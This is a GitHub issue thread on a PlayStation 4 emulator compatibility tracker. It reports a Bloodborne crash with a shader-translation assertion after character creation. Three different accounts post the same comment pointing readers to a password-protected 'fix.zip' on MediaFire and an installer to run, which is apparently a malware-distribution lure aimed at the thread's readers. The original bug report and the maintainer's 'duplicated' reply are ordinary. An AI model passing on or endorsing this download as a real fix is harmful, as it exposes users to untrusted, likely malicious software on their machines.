### ISSUE TITLE
Bloodborne

### ISSUE THREAD

**Issue by daastiks** [shadps4-emu/shadps4-game-compatibility#478]
### Game Name

Bloodborne

### Game code

CUSA03173

### Game version

v01.09

### Used emulator's version (only released versions are acceptable)

v0.2.0

### Current status

Ingame

### Error

structured_control_flow.cpp:operator():832: Assertion Failed!
Shader translation has failed

### Description

After coplete creating character game has been loading and has been crashed only after creating char
Yes its a secord report because  i get a fix.zip   but  my country not suporterd i from Ukraine 

### Screenshots

![image](https://github.com/user-attachments/assets/3506d3bb-5aec-4412-830d-9e5a561e07ff)

### Log File

[shad_log.txt](https://github.com/user-attachments/files/16745438/shad_log.txt)

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by georgemoralis** [comment]
duplicated
